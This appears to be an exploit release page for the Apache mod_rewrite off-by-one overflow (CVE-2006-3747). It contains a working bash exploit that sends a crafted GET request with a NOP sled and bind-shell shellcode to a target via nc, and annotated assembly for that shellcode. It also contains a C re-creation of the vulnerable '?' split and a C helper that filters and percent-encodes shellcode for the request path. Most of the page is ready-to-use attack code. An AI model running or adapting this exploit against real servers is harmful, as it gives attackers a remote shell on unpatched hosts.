<html>

<head>
<title>
off-by-one overflow in mod_rewrite
</title>
</head>

<body>
<h2>Exploit & info about off-by-one overflow in mod_rewrite module of Apache
HTTP server</h2>
<hr align="center" width="70%">

<ul>
<li>Vulnerable Apache versions:<br>
* 1.3 branch:  1.3.28 through 1.3.36 (fixed in 1.3.37)<br>
* 2.0 branch:  2.0.46 through 2.0.58 (fixed in 2.0.59)<br>
* 2.2 branch:  2.2.0  through 2.2.2  (fixed in 2.2.3)<br><br>
The bug is an off-by-one in escape_absolute_uri() in mod_rewrite: when the
substituted URL uses the ldap scheme, the part after the host is split on
'?' into a five-element token array on the stack, and the loop bound lets the
fifth '?' store a pointer one element past the end of that array. It is only
reachable through a RewriteRule that lets client input become the start of
the substitution, such as the "RewriteRule kung/(.*) $1" rule the exploit
assumes. Because what that stray pointer overwrites depends on what the
compiler placed next to the token array, not all vulnerable versions are
exploitable ones. I did a successful attack on Apache 1.3.34 (Debian Sarge
package).
<br><br>

<li>The Exploit (get the <a href="exploit.sh">source</a>):
<p>
When I posted the original exploit to Bugtraq on 2006-Aug-20 I sent it as a
quite long one-liner :) My e-mail client wrapped the line and introduced
stray whitespace between some opcodes of the shellcode; here is a corrected
and improved version:
</p>

<pre>
#!/bin/bash
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack &lt;jack\x40gulcas\x2Eorg&gt;
# 2006-08-20
#
# Thx to xuso for helping me with the shellcode.
#
# I suppose that you have the "RewriteRule kung/(.*) $1" rule; if not,
# <a href="draft_on_find_address.html">you must recalculate addresses</a>.
#
# Shellcode is based on Taeho Oh's bindshell on port 30464 and modified
# to survive Apache's URL handling (no 0x2f or 0x00 bytes). Take a look,
# it is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 (<a href="draft_on_find_address.html">for any other version/system find it</a>).
#
# Request layout: the captured "ldap://localhost/..." becomes the rewritten
# URL and reaches the vulnerable ldap token split. %90 x 128 is the NOP
# sled, followed by the shellcode; %3F is '?', the separator that split
# counts; the C bytes are padding and %77%ae%34%08 is the sled address
# 0x0834ae77 in little-endian byte order.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow"
echo -e "by jack &lt;jack\x40gulcas\x2eorg&gt;\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit 1
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc "$host" 80
</pre>

<li>The Shellcode:<br><br>
The assembler source for the opcodes shown above is based on Taeho Oh's
bind shell, modified to avoid the slash character (/) in the shell path
(/bin/sh) and simplified: no fork(), no short jumps, etc. The slash matters
because Apache rejects a request whose path decodes to a slash (%2F) or a
NUL, so the shellcode must not contain 0x2f or 0x00 bytes; the string is
therefore written as "#bin#sh#" and the '#' bytes are patched to '/'
(computed as 0x30 - 1) and NUL at run time:
<pre>
	<font color="blue">.section</font> .text
<font color="blue">.globl</font> _start

_start:
	<font color="blue">mov</font>  %esp,%esi <font color="darkviolet"># %esi = scratch area on the stack for syscall arguments</font>
	<font color="blue">xorl</font> %eax,%eax
	<font color="blue">xorl</font> %ebx,%ebx
	<font color="blue">movl</font> %esi,%ecx <font color="darkviolet"># %ecx = argument block for socketcall()</font>
	<font color="blue">movb</font> $0x2,%al
	<font color="blue">movl</font> %eax,(%esi) <font color="darkviolet"># AF_INET</font>
	<font color="blue">movb</font> $0x1,%al
	<font color="blue">movl</font> %eax,0x4(%esi) <font color="darkviolet"># SOCK_STREAM</font>
	<font color="blue">movb</font> $0x6,%al
	<font color="blue">movl</font> %eax,0x8(%esi) <font color="darkviolet"># IPPROTO_TCP</font>
	<font color="blue">movb</font> $0x66,%al <font color="darkviolet"># socketcall()</font>
	<font color="blue">movb</font> $0x1,%bl <font color="darkviolet"># SYS_SOCKET</font>
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)</font>
	<font color="blue">movl</font> %eax,(%esi) <font color="darkviolet"># args[0] = fd</font>
	<font color="blue">movb</font> $0x2,%al
	<font color="blue">movw</font> %ax,0xc(%esi) <font color="darkviolet"># sin_family = AF_INET</font>
	<font color="blue">movb</font> $0x77,%al <font color="darkviolet"># 0x77 = port 30464</font>
	<font color="blue">movw</font> %ax,0xe(%esi) <font color="darkviolet"># sin_port: bytes 77 00 = 0x7700 = 30464 in network byte order</font>
	<font color="blue">leal</font> 0xc(%esi),%eax
	<font color="blue">movl</font> %eax,0x4(%esi) <font color="darkviolet"># args[1] = &amp;sockaddr_in</font>
	<font color="blue">xorl</font> %eax,%eax
	<font color="blue">movl</font> %eax,0x10(%esi) <font color="darkviolet"># sin_addr = INADDR_ANY</font>
	<font color="blue">movb</font> $0x10,%al
	<font color="blue">movl</font> %eax,0x8(%esi) <font color="darkviolet"># args[2] = sizeof(sockaddr_in) = 16</font>
	<font color="blue">movb</font> $0x66,%al
	<font color="blue">movb</font> $0x2,%bl <font color="darkviolet"># SYS_BIND</font>
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># bind(fd, &amp;sockaddr_in, 16)</font>
	<font color="blue">movb</font> $0x1,%al
	<font color="blue">movl</font> %eax,0x4(%esi) <font color="darkviolet"># args[1] = backlog 1</font>
	<font color="blue">movb</font> $0x66,%al
	<font color="blue">movb</font> $0x4,%bl <font color="darkviolet"># SYS_LISTEN</font>
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># listen(fd, 1)</font>
	<font color="blue">xorl</font> %eax,%eax
	<font color="blue">movl</font> %eax,0x4(%esi) <font color="darkviolet"># args[1] = NULL</font>
	<font color="blue">movl</font> %eax,0x8(%esi) <font color="darkviolet"># args[2] = NULL</font>
	<font color="blue">movb</font> $0x66,%al
	<font color="blue">movb</font> $0x5,%bl <font color="darkviolet"># SYS_ACCEPT</font>
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># client = accept(fd, NULL, NULL)</font>
	<font color="blue">movb</font> %al,%bl <font color="darkviolet"># %ebx = client fd</font>
	<font color="blue">movb</font> $0x3f,%al <font color="darkviolet"># dup2()</font>
	<font color="blue">xorl</font> %ecx,%ecx
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># dup2(client, 0): stdin</font>
	<font color="blue">movb</font> $0x3f,%al
	<font color="blue">movb</font> $0x1,%cl
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># dup2(client, 1): stdout</font>
	<font color="blue">movb</font> $0x3f,%al
	<font color="blue">movb</font> $0x2,%cl
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># dup2(client, 2): stderr</font>
	<font color="blue">movl</font> $0x6e696223,%eax <font color="darkviolet"># String #bin</font>
	<font color="blue">movl</font> %eax,(%esi)
	<font color="blue">movl</font> $0x23687323,%eax <font color="darkviolet"># String #sh#</font>
	<font color="blue">movl</font> %eax,0x4(%esi) <font color="darkviolet"># (%esi) now holds "#bin#sh#"; '#' stands in for the forbidden '/' and NUL</font>
	<font color="blue">xorl</font> %eax,%eax
	<font color="blue">movb</font> %al,0x7(%esi) <font color="darkviolet"># last '#' becomes the terminating NUL</font>
	<font color="blue">movb</font> $0x30,%al <font color="darkviolet"># Move 0x30 to %al</font>
	<font color="blue">subb</font> $0x01,%al <font color="darkviolet"># Subtract one: 0x2f ('/') without a 0x2f byte in the opcodes</font>
	<font color="blue">movb</font> %al,0x4(%esi)
	<font color="blue">movb</font> %al,(%esi) <font color="darkviolet"># (%esi) is now "/bin/sh\0"</font>
	<font color="blue">movl</font> %esi,0x8(%esi) <font color="darkviolet"># argv[0] = pointer to "/bin/sh"</font>
	<font color="blue">xorl</font> %eax,%eax
	<font color="blue">movl</font> %eax,0xc(%esi) <font color="darkviolet"># argv[1] = NULL (the same word serves as the empty envp)</font>
	<font color="blue">movb</font> $0x0b,%al <font color="darkviolet"># execve()</font>
	<font color="blue">movl</font> %esi,%ebx <font color="darkviolet"># filename</font>
	<font color="blue">leal</font> 0x8(%esi),%ecx <font color="darkviolet"># argv</font>
	<font color="blue">leal</font> 0xc(%esi),%edx <font color="darkviolet"># envp (points at the NULL)</font>
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># Runs execve(&quot;/bin/sh&quot;, argv, envp);</font>
	<font color="blue">xorl</font> %eax,%eax
	<font color="blue">movb</font> $0x01,%al
	<font color="blue">xorl</font> %ebx,%ebx
	<font color="blue">int</font>  $0x80 <font color="darkviolet"># Runs exit(0);</font>
</pre>
</ul>
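<p>
The following is an added example, written for this page; it is not code from the
page, from the exploit, or from Apache. It re-creates in C the shape of the
ldap-scheme token split in mod_rewrite's escape_absolute_uri() that the
vulnerability lives in: the text after the host is split on '?' into a
five-element pointer array, and the loop bound lets the fifth '?' store a
pointer one element past the end. Function names (ldap_split,
neighbour_clobbered, qmarks_after_host) and the sample URL are mine; the real
function keeps char *token[5] on its stack, and here the caller passes a
six-slot array so that slot 5 stands in for whatever the compiler placed next
to the array, which lets the stray write be observed without undefined
behaviour. A limit of 5 reproduces the vulnerable loop; a limit of 4 is what
the fix amounts to.
</p>

```c
#include <stdio.h>
#include <string.h>

#define NTOKENS 5   /* the real function declares char *token[5] */

/* Simplified re-creation (not Apache's code) of the '?' split.  buf is the
 * part of an ldap URL after the host; slots must hold NTOKENS + 1 pointers
 * (slots[NTOKENS] is the stand-in for the stack neighbour).  limit is the
 * loop bound: 5 = vulnerable, 4 = fixed.  Returns the number of '?' consumed. */
static int ldap_split(char *buf, char *slots[], int limit)
{
    char *cp = buf;
    int c = 0;

    slots[0] = cp;
    while (*cp && c < limit) {
        if (*cp == '?') {
            slots[++c] = cp + 1;   /* with limit 5 this reaches slots[5] */
            *cp = '\0';
        }
        ++cp;
    }
    return c;
}

/* Runs one split over after_host with the given loop bound.  Stores the
 * number of '?' consumed in *tokens (if non-NULL) and returns 1 if the slot
 * past the five-element array was overwritten, 0 otherwise. */
static int neighbour_clobbered(const char *after_host, int limit, int *tokens)
{
    char buf[256];
    char *slots[NTOKENS + 1];
    char sentinel = 0;
    int c;

    snprintf(buf, sizeof buf, "%s", after_host);
    memset(slots, 0, sizeof slots);
    slots[NTOKENS] = &sentinel;          /* known value in the "neighbour" slot */
    c = ldap_split(buf, slots, limit);
    if (tokens)
        *tokens = c;
    return slots[NTOKENS] != &sentinel;
}

/* Detection helper: a substitution whose ldap path holds five or more '?'
 * characters after the host reaches the out-of-bounds write on a
 * vulnerable build. */
static int qmarks_after_host(const char *after_host)
{
    int n = 0;
    for (; *after_host; ++after_host)
        if (*after_host == '?')
            ++n;
    return n;
}

int main(void)
{
    /* Constructed probe, not a real request: exactly five '?' after the host. */
    const char *probe = "o=x?a?b?c?d?e";
    int c;

    printf("'?' count: %d\n", qmarks_after_host(probe));
    printf("vulnerable bound (5): consumed %d, neighbour clobbered: %d\n",
           (neighbour_clobbered(probe, 5, &c), c), neighbour_clobbered(probe, 5, NULL));
    printf("fixed bound (4):      consumed %d, neighbour clobbered: %d\n",
           (neighbour_clobbered(probe, 4, &c), c), neighbour_clobbered(probe, 4, NULL));
    return 0;
}
```

<p>
With the vulnerable bound the fifth '?' overwrites the neighbour slot with a
pointer into the URL copy, which is exactly the class of corruption the exploit
above turns into control of execution; with the fixed bound the loop stops
after four separators and the neighbour is untouched.
</p>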
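<p>
A second added example, again my own code rather than the exploit's or the
page's, does by hand what the shellcode section above requires: it rejects
the bytes Apache refuses in a decoded request path (NUL and 0x2f, the slash)
and percent-encodes the remaining bytes into the %xx form used in the GET
line, optionally prefixed with a %90 NOP sled as the exploit's perl one-liner
does. Function names (first_bad_byte, url_encode_shellcode, encodes_to,
build_path) are mine. The two sample byte strings are constructed from the
instructions discussed above: a naive mov $0x2f,%al (b0 2f), which cannot be
used, and the page's mov $0x30,%al; sub $0x01,%al (b0 30 2c 01), which can.
</p>

```c
#include <stdio.h>
#include <string.h>

/* Bytes that cannot appear in shellcode sent in the request path: Apache
 * refuses a path that decodes to a NUL or to an encoded slash. */
static const unsigned char BAD_BYTES[] = { 0x00, 0x2f };

/* Returns the offset of the first forbidden byte in sc, or -1 if none. */
static long first_bad_byte(const unsigned char *sc, size_t n)
{
    for (size_t i = 0; i < n; ++i)
        for (size_t j = 0; j < sizeof BAD_BYTES; ++j)
            if (sc[i] == BAD_BYTES[j])
                return (long)i;
    return -1;
}

/* Percent-encodes every byte as %xx (lower-case hex, like the exploit).
 * Returns the length written, or -1 if sc holds a forbidden byte or out is
 * too small.  out is NUL-terminated on success. */
static long url_encode_shellcode(const unsigned char *sc, size_t n,
                                 char *out, size_t outsz)
{
    if (first_bad_byte(sc, n) >= 0 || outsz < n * 3 + 1)
        return -1;
    for (size_t i = 0; i < n; ++i)
        sprintf(out + i * 3, "%%%02x", sc[i]);
    return (long)(n * 3);
}

/* True if sc encodes successfully and exactly to expected. */
static int encodes_to(const unsigned char *sc, size_t n, const char *expected)
{
    char buf[1024];
    long len = url_encode_shellcode(sc, n, buf, sizeof buf);
    return len >= 0 && strcmp(buf, expected) == 0;
}

/* Builds the request path the way the exploit does: prefix, then a NOP sled
 * of `sled` %90 bytes, then the encoded shellcode.  Returns the length or -1. */
static long build_path(const char *prefix, size_t sled,
                       const unsigned char *sc, size_t n,
                       char *out, size_t outsz)
{
    size_t need = strlen(prefix) + sled * 3 + n * 3 + 1;
    if (need > outsz)
        return -1;
    char *p = out;
    p += sprintf(p, "%s", prefix);
    for (size_t i = 0; i < sled; ++i)
        p += sprintf(p, "%%90");
    long enc = url_encode_shellcode(sc, n, p, outsz - (size_t)(p - out));
    if (enc < 0)
        return -1;
    return (long)(p - out) + enc;
}

int main(void)
{
    /* Constructed samples: naive "mov $0x2f,%al" vs the page's 0x30 - 1 trick. */
    const unsigned char naive[] = { 0xb0, 0x2f };
    const unsigned char safe[]  = { 0xb0, 0x30, 0x2c, 0x01 };
    char path[512];

    printf("naive: first forbidden byte at offset %ld\n",
           first_bad_byte(naive, sizeof naive));
    printf("safe:  first forbidden byte at offset %ld\n",
           first_bad_byte(safe, sizeof safe));
    if (build_path("/kung/ldap://localhost/", 4, safe, sizeof safe,
                   path, sizeof path) > 0)
        printf("path: %s\n", path);
    return 0;
}
```

<p>
Run a candidate shellcode through first_bad_byte before encoding it; the
rest of the encoder is deliberately strict so that a forbidden byte cannot
slip into the request and turn a working sled into a 400 or 404 response.
</p>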

(c) spinfoo

</body>
</html>